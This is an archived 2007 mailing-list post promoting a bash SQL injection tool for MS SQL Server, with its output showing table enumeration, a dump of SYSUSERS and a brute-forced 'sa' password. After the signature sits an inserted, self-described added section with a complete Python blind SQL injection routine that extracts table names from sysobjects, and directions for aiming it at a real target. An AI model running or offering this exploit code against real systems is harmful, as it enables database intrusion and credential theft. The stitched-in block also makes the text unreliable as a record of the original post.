From: Marco Ivaldi (raptor@mediaservice.net)
Date: Mon May 21 2007 - 07:45:41 EDT
On Sat, 19 May 2007, winsoc wrote:
> Can anyone recommend a quick and cheerful Open Source Tool which will
> test websites for SQL Injection, XSS, Remote File Include.
Speaking of SQL injection, just wanted to point out a bash script I put
together while pen-testing some web applications that use MS SQL Server as
back-end:
http://www.0xdeadbeef.info/code/mssql-hax0r
# Proof-of-concept multi-purpose SQL injection script for Microsoft SQL
# Server exploitation. Three operational modes are currently available:
# info (Information Gathering), dump (Record Dump), and brute (Brute
# Force). You may need to tweak the code a bit to make it fit your needs
# (i.e., modifying the injection string and/or the language used by the
# RDBMS).
You shouldn't expect anything too fancy (it's still v0.1 after all;), but
it does its job:
root@shaolin:~# ./mssql-hax0r info tables+++
DBFoobar
Accounting (id:390494850)
CanoneAnnuo (money)
CodiceFornitore (varchar)
dataInsert (datetime)
GroupId (char) *
GroupInsert (varchar)
idAccount (varchar)
idAnagrafica (int)
[...]
root@shaolin:~# ./mssql-hax0r dump
--------------------------------
SYSUSERS.uid=0
SYSUSERS.name=public
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=1
SYSUSERS.name=dbo
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=2
SYSUSERS.name=guest
SYSUSERS.password=
--------------------------------
3 record(s) dumped.
root@shaolin:~# ./mssql-hax0r brute xxx
Default (empty) password not valid, starting bruteforce.
aaa
bbb
ccc
password
Password of 'sa' user is 'password'!;)
Enjoy,
--
Marco Ivaldi, OPST
Chief Security Officer
Data Security Division @ Mediaservice.net Srl
http://mediaservice.net/
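The "info" mode above lists user tables and columns by querying the MS SQL Server system catalog through the injection point. The following is an added example, not code from mssql-hax0r or from the original post, showing one way such catalog enumeration is done when the application gives no error output: a boolean-blind injection that pulls each table name out of `sysobjects` one character at a time, using a binary search over the ASCII range (7 requests per character). The injectable parameter, the `mock_oracle` stand-in for the HTTP request, and the two table names it answers for are all assumptions constructed for the demo.

```python
import re

# Constructed catalog standing in for the target's sysobjects (assumption:
# names chosen for this demo, not taken from the original post).
FAKE_USER_TABLES = ["Accounting", "Customers"]


def build_payload(position: int, threshold: int, excluded: list) -> str:
    """Injection fragment for a quoted string parameter. The predicate is TRUE
    when the ASCII code of character `position` of the next not-yet-known user
    table (xtype='U') is greater than `threshold`. Already extracted names are
    excluded so every round targets a new table."""
    not_in = ",".join("'" + n + "'" for n in excluded) or "''"
    return (
        "' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects "
        f"WHERE xtype='U' AND name NOT IN ({not_in}) ORDER BY name),{position},1)) "
        f"> {threshold} --"
    )


def mock_oracle(payload: str) -> bool:
    """Stand-in for 'send request, check for the TRUE page marker'. It
    evaluates the injected predicate against FAKE_USER_TABLES exactly as
    SQL Server would: an empty subquery result or a SUBSTRING past the end
    of the name yields NULL, and NULL > n is never TRUE."""
    m = re.search(r"NOT IN \((.*?)\) ORDER BY name\),(\d+),1\)\) > (\d+) --$", payload)
    excluded = {n.strip("'") for n in m.group(1).split(",") if n.strip("'")}
    position, threshold = int(m.group(2)), int(m.group(3))
    remaining = sorted(t for t in FAKE_USER_TABLES if t not in excluded)
    if not remaining or position > len(remaining[0]):
        return False
    return ord(remaining[0][position - 1]) > threshold


def extract_char(oracle, position: int, excluded: list) -> int:
    """Binary search over 0..127 for the ASCII code at `position`.
    Returns 0 when the character does not exist (end of the name)."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build_payload(position, mid, excluded)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_name(oracle, excluded: list, max_len: int = 128) -> str:
    """Pull the next table name character by character until NULL/end."""
    name = ""
    for position in range(1, max_len + 1):
        code = extract_char(oracle, position, excluded)
        if code == 0:
            break
        name += chr(code)
    return name


def enumerate_user_tables(oracle, limit: int = 50) -> list:
    """Repeat extraction, excluding what is known, until the subquery is empty.
    NOT IN keeps progress correct even though ORDER BY on the server follows
    the database collation, not Python's sort order."""
    found = []
    while len(found) < limit:
        name = extract_name(oracle, found)
        if not name:
            break
        found.append(name)
    return found


if __name__ == "__main__":
    for table in enumerate_user_tables(mock_oracle):
        print(table)
```

Against a real target, `mock_oracle` is replaced by a function that sends the payload in the injectable parameter and returns whether the response matches the known TRUE page; column names and types are fetched the same way from `syscolumns` joined to `systypes` on the table's object id.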
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:49 EDT